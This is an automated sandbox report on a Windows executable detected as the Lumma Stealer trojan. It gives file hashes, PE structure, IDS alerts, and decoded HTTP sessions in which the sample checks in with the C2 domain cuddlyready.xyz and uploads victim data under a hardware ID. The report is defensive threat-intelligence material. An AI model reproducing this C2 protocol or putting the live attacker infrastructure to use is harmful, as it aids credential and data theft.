104.21.32.96 | cuddlyready.xyz | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579757
Start date and time: 2024-12-23 08:37:50 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 21s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: QQ5BxgG5G6.exe (renamed because the original name is a hash value)
Original Sample Name: 4a7846259e3d582b57bd30c67322c357.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target QQ5BxgG5G6.exe, PID 7792 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:38:50 | API Interceptor | 8x Sleep call for process: QQ5BxgG5G6.exe modified
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          104.21.32.96LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            cuddlyready.xyzFjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.150.173
                                                                                                            mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 172.67.150.173
                                                                                                            w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.150.173
                                                                                                            pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.150.173
                                                                                                            LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 104.21.32.96
                                                                                                            0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                            • 172.67.150.173
                                                                                                            Wave-Executor.exeGet hashmaliciousLummaCBrowse
                                                                                                            • 193.143.1.9
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
CLOUDFLARENETUS | FjFeChttqA.exe | malicious | LummaC | 172.67.150.173
 | mG83m82qhF.exe | malicious | LummaC | 172.67.150.173
 | w23Vg439U1.exe | malicious | LummaC, Stealc | 172.67.150.173
 | pfY4k1qisn.exe | malicious | LummaC, Stealc | 172.67.150.173
 | LP4a6BowQN.exe | malicious | LummaC | 104.21.32.96
 | 0OkLsJL2Bn.exe | malicious | LummaC, Stealc | 172.67.150.173
 | zLP3oiwG1g.exe | malicious | LummaC | 104.21.36.201
 | 0HdDuWzp54.exe | malicious | LummaC, Stealc | 172.67.199.72
 | Yh6fS6qfTE.exe | malicious | LummaC | 104.21.36.201
 | NE4jxHLxXJ.exe | malicious | LummaC, Stealc | 172.67.199.72
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | FjFeChttqA.exe | malicious | LummaC | 104.21.32.96
 | mG83m82qhF.exe | malicious | LummaC | 104.21.32.96
 | w23Vg439U1.exe | malicious | LummaC, Stealc | 104.21.32.96
 | pfY4k1qisn.exe | malicious | LummaC, Stealc | 104.21.32.96
 | LP4a6BowQN.exe | malicious | LummaC | 104.21.32.96
 | 0OkLsJL2Bn.exe | malicious | LummaC, Stealc | 104.21.32.96
 | zLP3oiwG1g.exe | malicious | LummaC | 104.21.32.96
 | 0HdDuWzp54.exe | malicious | LummaC, Stealc | 104.21.32.96
 | Yh6fS6qfTE.exe | malicious | LummaC | 104.21.32.96
 | NE4jxHLxXJ.exe | malicious | LummaC, Stealc | 104.21.32.96
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.949561489369776
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: QQ5BxgG5G6.exe
File size: 1'866'752 bytes
MD5: 4a7846259e3d582b57bd30c67322c357
SHA1: 3e54a3d27a36c4a24b7f642da39c0477d23d1848
SHA256: 11774b91cf5fc5c4ad30a79ea9a2159271de17c68b2ac7149b15fb23d9828587
SHA512: ef08f1c3490cfb183d2ed17509a31fd10457adb0d8a98fb00401c30570cc1527dec561156c935b584334ba9b39f02b5e186c467d88efed3d756a54d7a8ceff89
SSDEEP: 49152:gVhyhC3VahV9jLzeUOQngQT1EAiDabGkyLkccZpC:ywCch/L9ngu1EdDNps0
TLSH: 1885339F7C8BC636C1BC4639F9874FC8AF6B8846D5170D20BE0983B2E617325B955392
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g............................. J...........@..........................PJ......U....@.................................T0..h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x8a2000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Instruction
jmp 00007F88DC52011Ah
cvtps2pd xmm3, qword ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F88DC522115h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x51000 | 0x24800 | e6e41231c0f8c7e0b9c948233ffab0bc | False | 0.9973177975171232 | data | 7.976685919337456 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x52000 | 0x1ac | 0x200 | 75720b8ea60aa06a31806981b744f74e | False | 0.5390625 | data | 5.245569576626531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x54000 | 0x2ad000 | 0x200 | 6b8e315819f3bc3708aa7522d5c2f10d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
irlkmphe | 0x301000 | 0x1a0000 | 0x19f800 | b4f804204ea7733467df9202e6a9e140 | False | 0.9946247931708785 | data | 7.95433500185407 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
zsmofqts | 0x4a1000 | 0x1000 | 0x400 | c3ab4e098a4dea22cd9ab37d1a64453a | False | 0.724609375 | data | 5.808743851736421 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4a2000 | 0x3000 | 0x2200 | 9fafd61aaa92459ada90d45e6e362fc3 | False | 0.05962775735294118 | DOS executable (COM) | 0.7960984011552383 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x52058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-23T08:38:50.538800+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49705 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:51.286446+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 49705 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:51.286446+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49705 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:52.513407+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49706 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:53.600013+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.8 | 49706 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:53.600013+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 49706 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:55.423450+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49707 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:56.325027+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.8 | 49707 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:57.659276+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49708 | 104.21.32.96 | 443 | TCP
2024-12-23T08:38:59.961477+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49709 | 104.21.32.96 | 443 | TCP
2024-12-23T08:39:02.515687+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49710 | 104.21.32.96 | 443 | TCP
2024-12-23T08:39:05.146490+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49712 | 104.21.32.96 | 443 | TCP
2024-12-23T08:39:08.780984+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 49715 | 104.21.32.96 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 08:38:49.043800116 CET | 63630 | 53 | 192.168.2.8 | 1.1.1.1
Dec 23, 2024 08:38:49.185154915 CET | 53 | 63630 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 08:38:49.043800116 CET | 192.168.2.8 | 1.1.1.1 | 0x43ed | Standard query (0) | cuddlyready.xyz | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 08:38:49.185154915 CET | 1.1.1.1 | 192.168.2.8 | 0x43ed | No error (0) | cuddlyready.xyz |  | 104.21.32.96 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:38:49.185154915 CET | 1.1.1.1 | 192.168.2.8 | 0x43ed | No error (0) | cuddlyready.xyz |  | 172.67.150.173 | A (IP address) | IN (0x0001) | false

• cuddlyready.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 104.21.32.96 | 443 | 7792 | C:\Users\user\Desktop\QQ5BxgG5G6.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:38:50 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: cuddlyready.xyz
2024-12-23 07:38:50 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-23 07:38:51 UTC | 1127 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:38:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8rge7rmir1mlolekj9an5h314b; expires=Fri, 18 Apr 2025 01:25:30 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UdGV2Hb52%2FbsAsonJBgki1ElEFogG%2BczmDSnoStowkwNNuW64QU2ZMF0fT%2FPUOsTgV3S5LzWgETBvFkROKiPM56wnf8mx37%2Bcg%2BddRvTF8GKctjaQdLkFSQoTltfzEwtVkQ%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f66b1c38ae932f4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1911&min_rtt=1904&rtt_var=729&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1486761&cwnd=112&unsent_bytes=0&cid=2974937d527f99ec&ts=762&x=0"
2024-12-23 07:38:51 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii (chunk size line, then chunk body):
2
ok
2024-12-23 07:38:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49706 | 104.21.32.96 | 443 | 7792 | C:\Users\user\Desktop\QQ5BxgG5G6.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:38:52 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: cuddlyready.xyz
2024-12-23 07:38:52 UTC | 47 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
2024-12-23 07:38:53 UTC | 1128 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:38:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=8cmlad1boicnrakc1g19mkicfk; expires=Fri, 18 Apr 2025 01:25:32 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2B3yude%2FCjblb%2BCUiE45jdJdWYq0kZq%2BgW8bP9C9uud6tFa%2BK1BN0M0CTd7EP19jDKTm2isgDr03o2RD6PNEhuBIeWpUJQwnrZxvg5BLAPC58gzJ2sIA5ItZ55LEBrxgHX0%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f66b1cfe8840f74-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1465&min_rtt=1459&rtt_var=560&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=946&delivery_rate=1931216&cwnd=151&unsent_bytes=0&cid=43b95cf8676bfe1d&ts=1096&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49707 | 104.21.32.96 | 443 | 7792 | C:\Users\user\Desktop\QQ5BxgG5G6.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:38:55 UTC | 282 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=6M4MVPLOGKI530K8YLD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12852
Host: cuddlyready.xyz
2024-12-23 07:38:55 UTC | 12852 | OUT | Data Raw: 2d 2d 36 4d 34 4d 56 50 4c 4f 47 4b 49 35 33 30 4b 38 59 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 35 41 31 44 39 36 32 36 33 32 39 44 46 32 44 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 4d 34 4d 56 50 4c 4f 47 4b 49 35 33 30 4b 38 59 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4d 34 4d 56 50 4c 4f 47 4b 49 35 33 30 4b 38 59 4c 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
Data Ascii (CRLF line breaks restored from the raw bytes; display truncated by the sandbox):
--6M4MVPLOGKI530K8YLD
Content-Disposition: form-data; name="hwid"

C5A1D9626329DF2DAC8923850305D13E
--6M4MVPLOGKI530K8YLD
Content-Disposition: form-data; name="pid"

2
--6M4MVPLOGKI530K8YLD
Content-Disposition: form-data; name="lid"

PsFKDg--pa
2024-12-23 07:38:56 UTC | 1137 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:38:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=j2n204guvgjvg6lr9veothipeb; expires=Fri, 18 Apr 2025 01:25:34 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vYtbjhRRPbzH%2FjiH1Sd%2BGEe%2BIffHqNHD7Hc3D4KCjp%2Bf53O9L0cxAVH59Qwm7but5Lf8jInuxLEnQ1nheP7PJnzTSM7fE%2B8xOI%2BLqYW0TXgsS6%2F9PBlxeuI%2BkWe6rkn96TU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f66b1e16e605e7f-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1556&rtt_var=606&sent=10&recv=16&lost=0&retrans=0&sent_bytes=2835&recv_bytes=13792&delivery_rate=1772920&cwnd=228&unsent_bytes=0&cid=e632a28df5755490&ts=908&x=0"
2024-12-23 07:38:56 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii (chunk size line, then chunk body):
f
ok 8.46.123.189
2024-12-23 07:38:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.849708104.21.32.964437792C:\Users\user\Desktop\QQ5BxgG5G6.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-12-23 07:38:57 UTC281OUTPOST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=XWG7F67A48QVQTANXO
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 15075
                                                                                                            Host: cuddlyready.xyz
2024-12-23 07:38:57 UTC | 15075 | OUT | Data Ascii: --XWG7F67A48QVQTANXOContent-Disposition: form-data; name="hwid"C5A1D9626329DF2DAC8923850305D13E--XWG7F67A48QVQTANXOContent-Disposition: form-data; name="pid"2--XWG7F67A48QVQTANXOContent-Disposition: form-data; name="lid"PsFKDg--pablo
2024-12-23 07:38:58 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Mon, 23 Dec 2024 07:38:58 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=lbfvk091k92dvp0gqjda4i43oa; expires=Fri, 18 Apr 2025 01:25:37 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WFyIanwfnINrfYjQ%2BBFJuT57SaN9xVSV7k4smYT8foV7UiI9rOVDh%2FQubIc5gvOKaVvmmWwCNS8FaRDSANHNpakjnrfYCBl1RAs679VF0N5UWTUGE0WV3bOp6niLw11PnRo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f66b1ef5c7742c6-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1650&min_rtt=1612&rtt_var=632&sent=10&recv=20&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16014&delivery_rate=1811414&cwnd=149&unsent_bytes=0&cid=340327a9f1e68f48&ts=832&x=0"
2024-12-23 07:38:58 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:38:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49709 | 104.21.32.96 | 443 | 7792 | C:\Users\user\Desktop\QQ5BxgG5G6.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:38:59 UTC | 280 | OUT | POST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=SZOO0P7591CXSVW1X
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 20236
                                                                                                            Host: cuddlyready.xyz
2024-12-23 07:38:59 UTC | 15331 | OUT | Data Ascii: --SZOO0P7591CXSVW1XContent-Disposition: form-data; name="hwid"C5A1D9626329DF2DAC8923850305D13E--SZOO0P7591CXSVW1XContent-Disposition: form-data; name="pid"3--SZOO0P7591CXSVW1XContent-Disposition: form-data; name="lid"PsFKDg--pablo-
2024-12-23 07:39:00 UTC | 1133 | IN | HTTP/1.1 200 OK
                                                                                                            Date: Mon, 23 Dec 2024 07:39:00 GMT
                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                            Transfer-Encoding: chunked
                                                                                                            Connection: close
                                                                                                            Set-Cookie: PHPSESSID=cgopllgcc5qbu1ilqubis81kqo; expires=Fri, 18 Apr 2025 01:25:39 GMT; Max-Age=9999999; path=/
                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            X-Frame-Options: DENY
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                            cf-cache-status: DYNAMIC
                                                                                                            vary: accept-encoding
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nR%2Fy7RvRBW%2FMgoaN5Pzh%2Be8S2cf3vXGHlEyffT2H7a7MwJk8Ot02ayyiPK1OcI6IGQdTORfT0QXCNzEqbHOX9IX%2BdQtYic0LFpNn%2F3kyr2D2wH%2FJNKEzyckc4018JBQLR68%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8f66b1fdca48efa5-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1899&rtt_var=719&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21196&delivery_rate=1515308&cwnd=200&unsent_bytes=0&cid=bceca79696ce281b&ts=923&x=0"
2024-12-23 07:39:00 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-23 07:39:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49710 | 104.21.32.96 | 443 | 7792 | C:\Users\user\Desktop\QQ5BxgG5G6.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:39:02 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            Content-Type: multipart/form-data; boundary=B15U8NRI2RHK
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                            Content-Length: 1200
                                                                                                            Host: cuddlyready.xyz
